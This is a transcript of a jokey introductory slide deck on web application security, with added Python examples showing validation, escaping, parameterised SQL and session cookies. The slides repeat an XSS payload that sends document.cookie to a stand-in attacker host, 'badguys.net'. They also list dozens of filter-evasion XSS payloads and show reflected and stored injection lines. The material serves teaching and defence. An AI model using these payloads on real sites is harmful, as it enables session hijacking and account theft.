Basic Web Application Security - PowerPoint PPT Presentation

Basic Web Application Security. User Input. Kick Your Arse. Three Ways. (All Awesome). Validation. Passive. (No touchy-touchy). This is a Number. 2. This is not a Number. a. This is really not a Number. <script>alert('loldongs')</script>. Filtering. Destructive. (One-Way Street).

PowerPoint Slideshow about 'Basic Web Application Security' - lyneth

Presentation Transcript

Basic Web Application Security

User Input

Kick Your Arse

Three Ways

(All Awesome)



Validation

Passive

(No touchy-touchy)




This is a Number.

2

This is not a Number.

a

This is really not a Number.

<script>alert('loldongs')</script>



Filtering

Destructive

(One-Way Street)







What happens when

you screw it up?

White-Listing → Usability Problems

Black-Listing → Security Problems

(Always a trade-off.)
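As an added example (not part of the deck), here are the first two of the three ways in Python, run over the deck's own inputs ("2", "a", the script tag) plus a name with an apostrophe and one line from the later filter-evasion slides. Validation only looks; filtering destroys; a white-list mangles the name (usability problem) while a black-list lets the second tag straight through (security problem). The function names and regexes are my own, not the talk's:

```python
import re

# Constructed sample inputs: the three the deck uses, plus a name with an
# apostrophe and one line from the deck's own "THIS HARD" filter-evasion list.
NUMBER = "2"
LETTER = "a"
SCRIPT = "<script>alert('loldongs')</script>"
NAME = "Sam O'Brien"
EVASION = "<IMG SRC=javascript:alert('a')>"


def validate_number(value: str) -> bool:
    """Validation is passive: inspect the input and say yes or no, never change it.
    fullmatch means the whole string must be digits, not just some part of it."""
    return re.fullmatch(r"[0-9]+", value) is not None


def filter_whitelist(value: str) -> str:
    """Filtering is destructive: keep only characters on the allowed list.
    Everything else is gone for good, which is the one-way street."""
    return re.sub(r"[^A-Za-z0-9 ]", "", value)


def filter_blacklist(value: str) -> str:
    """A black-list filter removes only the one thing we thought of (literal
    <script> tags) and passes everything else through untouched."""
    return re.sub(r"(?i)</?script>", "", value)


def classify(value: str) -> dict:
    """Run all three treatments over one input so the differences are visible."""
    return {
        "input": value,
        "is_number": validate_number(value),
        "whitelisted": filter_whitelist(value),
        "blacklisted": filter_blacklist(value),
    }


if __name__ == "__main__":
    for sample in (NUMBER, LETTER, SCRIPT, NAME, EVASION):
        print(classify(sample))
```

The white-list turns Sam O'Brien into "Sam OBrien" and the black-list leaves the IMG line exactly as it arrived: that is the trade-off the slide is talking about.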



Transport

Point A → Point B



Different Media, Different Escaping


HTML

<b>Huh.</b>

<p><i>&lt;b&gt;Huh.&lt;/b&gt;</i></p>

<b>Huh</b>


SQL

Sam O’Brien

INSERT INTO mah_peeps (name) VALUES ('Sam O\'Brien');

1, Sam O’Brien, 2010-09-02 18:30:00
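Added example, not from the slides: the two media above handled in Python. The HTML value gets html.escape (the cgi.escape the deck names later was removed in Python 3.8); the SQL value gets a bound parameter, so the driver transports the apostrophe instead of the hand-written backslash the slide shows, and the un-escaped version is kept beside it to show why the slide bothers escaping at all. The table shape, column names and function names are assumptions modelled on the slide's mah_peeps insert, and sqlite3 stands in for whatever database the talk had in mind:

```python
import html
import sqlite3

# Constructed inputs, the same two the slides use.
HTML_INPUT = "<b>Huh.</b>"
NAME_INPUT = "Sam O'Brien"


def escape_for_html(text: str) -> str:
    """HTML medium: turn markup characters into entities so the browser shows
    them as text. quote=True also handles " and ', so the result is safe
    inside attribute values as well as between tags."""
    return html.escape(text, quote=True)


def open_db() -> sqlite3.Connection:
    """In-memory table shaped like the slide's mah_peeps (id, name, timestamp)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE mah_peeps ("
        "id INTEGER PRIMARY KEY, name TEXT NOT NULL, "
        "created_at TEXT DEFAULT CURRENT_TIMESTAMP)"
    )
    return conn


def store_name_naive(conn: sqlite3.Connection, name: str) -> bool:
    """No escaping at all: the apostrophe in O'Brien ends the string literal
    early and the statement fails to parse. Returns False instead of raising."""
    try:
        conn.execute("INSERT INTO mah_peeps (name) VALUES ('%s')" % name)
        return True
    except sqlite3.Error:
        return False


def store_name(conn: sqlite3.Connection, name: str) -> bool:
    """SQL medium: a bound parameter carries the value separately from the
    statement text, so no hand-written backslash escaping is needed."""
    conn.execute("INSERT INTO mah_peeps (name) VALUES (?)", (name,))
    return True


def fetch_names(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT name FROM mah_peeps ORDER BY id")]


def render_name_html(name: str) -> str:
    """Same value, other medium: when the stored name goes back out in a page
    it gets HTML escaping, not SQL escaping."""
    return "<td>%s</td>" % escape_for_html(name)


def demo() -> dict:
    conn = open_db()
    naive_ok = store_name_naive(conn, NAME_INPUT)
    store_name(conn, NAME_INPUT)
    return {
        "html_escaped": escape_for_html(HTML_INPUT),
        "naive_insert_ok": naive_ok,
        "stored_names": fetch_names(conn),
        "rendered": render_name_html(NAME_INPUT),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

Escaping belongs to the medium, not to the value: the same name goes into the database as a parameter and out to the browser as entities, and neither treatment would do the other job.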


XSS

(Cross-Site Scripting)


XSS

(XTREME Site Scripting)


Sticking Scripts Where They Don’t Belong.

You there, down the back.

Stop sniggering.


<script>alert('HACKED BY LOLDONGS')</script>

Amateurs!


<script>alert(document.cookie)</script>

Hmm.


<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Oh shit.


Why is this uncool?

(Yeah! Why?)


<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Ooooh shit.


<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Oooooooooooh shit.


<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Oooooooooooooooooh shit.


Why is this really uncool?

(Because shut up.)


HTTP

Hyper-Text Thingy I-forgot-again




It can guess. (Badly.)

IP Address

Browser User-Agent


Sends a cookie with each request.

(A basket of goodies that the browser sends faithfully every request.)


The Server puts a unique ID in the basket.

PHPSESSID=123your456mum789

__utma=12948.23.4211414.5553

is_a_furry=1


Browser sends the ID every request.

PHPSESSID=123your456mum789


<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Look again.


THEY HAVE YOUR COOKIE.

Ooooooooooooooooooooooo-
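Added example, not from the deck: the cookie round-trip the last few slides describe, done with Python's standard library. The server mints an unguessable ID, keeps the "who is this" mapping on its own side, and the browser hands the ID back in the basket on every request; a guessed ID like the slide's resolves to nobody. The in-memory store, the user name and the function names are assumptions. HttpOnly is an added mitigation the slides do not mention: with it set, document.cookie no longer returns the session cookie, which is what the injected script above depends on:

```python
import secrets
from http.cookies import SimpleCookie

# Constructed in-memory session store: session ID -> user name. A real server
# would use a database or cache, but the mechanics are the same.
SESSIONS = {}


def start_session(username: str) -> tuple:
    """Server side: mint an unguessable ID, remember whose it is, and put it in
    the basket via Set-Cookie. The ID itself carries no user data; the user is
    only known by looking it up in SESSIONS. HttpOnly keeps the cookie out of
    document.cookie (added mitigation, not on the slides)."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = username
    cookie = SimpleCookie()
    cookie["PHPSESSID"] = sid
    cookie["PHPSESSID"]["path"] = "/"
    cookie["PHPSESSID"]["httponly"] = True
    return sid, cookie.output(header="Set-Cookie:")


def parse_cookie_header(header: str) -> dict:
    """Browser side of the deal: every request carries 'Cookie: a=1; b=2'
    and the server unpacks the basket into name -> value."""
    cookie = SimpleCookie()
    cookie.load(header)
    return {name: morsel.value for name, morsel in cookie.items()}


def resolve_user(cookie_header: str):
    """Look the ID up in the store. Unknown or guessed IDs resolve to None."""
    sid = parse_cookie_header(cookie_header).get("PHPSESSID")
    return SESSIONS.get(sid)


def demo() -> dict:
    sid, set_cookie = start_session("sam")
    # Constructed request header, shaped like the basket on the slides.
    request_cookie = "PHPSESSID=%s; __utma=12948.23.4211414.5553; is_a_furry=1" % sid
    return {
        "set_cookie": set_cookie,
        "basket": parse_cookie_header(request_cookie),
        "user": resolve_user(request_cookie),
        "guessed": resolve_user("PHPSESSID=123your456mum789"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

Whoever presents a valid ID is, as far as the server can tell, the user it was issued to, which is why the script on the previous slide only needs to read the cookie and not the password.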



HTML

Validation Really Hard.


HTML

Filtering Still Really Hard.

  • Use a library, e.g. HTML Purifier.


HTML

Escaping Dead Easy.

  • Most languages have stuff to handle this, e.g. htmlentities(), cgi.escape(), CGI.escape().


How hard is filtering?

(It’s just <script>, right?)


THIS HARD.

<IMG SRC=javascript:alert('a')>

<img src=javascript:alert(&quot;a&quot;)>

<img """><script>alert('a')</script>">

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="javascript:alert('a');">

<IMG SRC="jav&#x09;as&#x09cript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<SCR\0IPT>alert('a')</SCR\0IPT>

<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>

<img onmouseover!#$%&=alert('a')>

<<SCRIPT>alert("a");//<</SCRIPT>

<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>

<SC\0RIPT SRC=http://foo/x.js?<B>

<script src=//foo/x.js>

<img src="javascript:alert('a')"

  • (Well, then.)


THIS HARD.

<iframe src=http://foo/x.html <

<body background="javascript:alert('a')">

<BODY ONLOAD=alert('a')>

<img dynsrc="javascript:alert('a')">

<img lowsrc="javascript:alert('a')">

<BGSOUND SRC=javascript:alert('a')>

<BR SIZE="&{alert('a')}">

<LAYER SRC="http://foo/x.html"></LAYER>

<link rel="stylesheet" href="javascript:alert('a');">

<XSS STYLE="behavior: url(xss.htc);">

<STYLE>BODY{-moz-binding:url("http://foo/x.xml#xss")}</STYLE>

<IMG SRC='vbscript:msgbox("a")'>

<img src="livescript:alert('a')">

¼script¾alert(¢XSS¢)¼/script¾ (US-ASCII encoding evasion)

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('a');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

  • (Well, then.)


THIS HARD.

<DIV STYLE="background-image: url(javascript:alert('a'))">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('a'))">

<DIV STYLE="width: expression(alert('a'));">

<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">

exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("a"))'>

<STYLE TYPE="text/javascript">alert('a');</STYLE>

<STYLE>.x{background-image:url("javascript:alert('a')");}</STYLE><A CLASS=X></A>

<BASE HREF="javascript:alert('a');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://foo/x.html"></OBJECT>

<EMBED SRC="http://foo/xss.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd....jwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

  • (Well, then.)
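Added example, not from the deck: the "it's just <script>, right?" filter from a few slides back, run in Python over a handful of the lines above, next to plain output escaping. The payload list is copied from the slides; the function names and the crude "does a raw angle bracket survive" check are mine:

```python
import html
import re

# Constructed list: a few lines copied from the deck's own "THIS HARD" slides.
NESTED = "<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>"
PAYLOADS = [
    "<IMG SRC=javascript:alert('a')>",
    "<SCR\0IPT>alert('a')</SCR\0IPT>",
    "<BODY ONLOAD=alert('a')>",
    "<<SCRIPT>alert(\"a\");//<</SCRIPT>",
    "<DIV STYLE=\"width: expression(alert('a'));\">",
    NESTED,
]


def naive_filter(text: str) -> str:
    """The 'it's just <script>, right?' filter: delete literal script tags, once."""
    return re.sub(r"(?i)</?script>", "", text)


def escape_output(text: str) -> str:
    """Escaping instead of filtering: every < > & " ' becomes an entity, so the
    browser renders the input as text whatever it contains."""
    return html.escape(text, quote=True)


def still_has_markup(text: str) -> bool:
    """Crude but honest check: a raw angle bracket reaching the page means the
    browser, not us, gets to decide what the text means."""
    return "<" in text or ">" in text


def filter_misses() -> list:
    """Payloads that still carry raw markup after the black-list filter."""
    return [p for p in PAYLOADS if still_has_markup(naive_filter(p))]


def escape_misses() -> list:
    """Payloads that still carry raw markup after escaping (expected: none)."""
    return [p for p in PAYLOADS if still_has_markup(escape_output(p))]


if __name__ == "__main__":
    print("filter lets through %d of %d" % (len(filter_misses()), len(PAYLOADS)))
    print("nested line after one pass:", naive_filter(NESTED))
    print("escape lets through %d of %d" % (len(escape_misses()), len(PAYLOADS)))
```

The nested line is the one to look at: removing the inner tags leaves a clean script tag behind, which is exactly the slide's point that a filter has to anticipate every trick while escaping has to know only which characters matter in HTML.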



Remember <script>alert()</script>?

(Yes, I do. Shut up.)




Do you have any javascript functions your site uses to do anything useful?

(... Yes.)



That injected code can trigger forms, run javascript functions, or make AJAX calls.

(... Oooooh.)


Send someone to a link that looks like: http://my.site/?user=<script>doStuff();</script>

(... Oooooooooh.)


Or store something that will output this on someone’s profile page: <script>doStuff();</script>

(... Oooooooooooooooh.)


... And you’re hosed.

(Shit.)


The Human Element

Touchy-Feely Commie Bullshit.

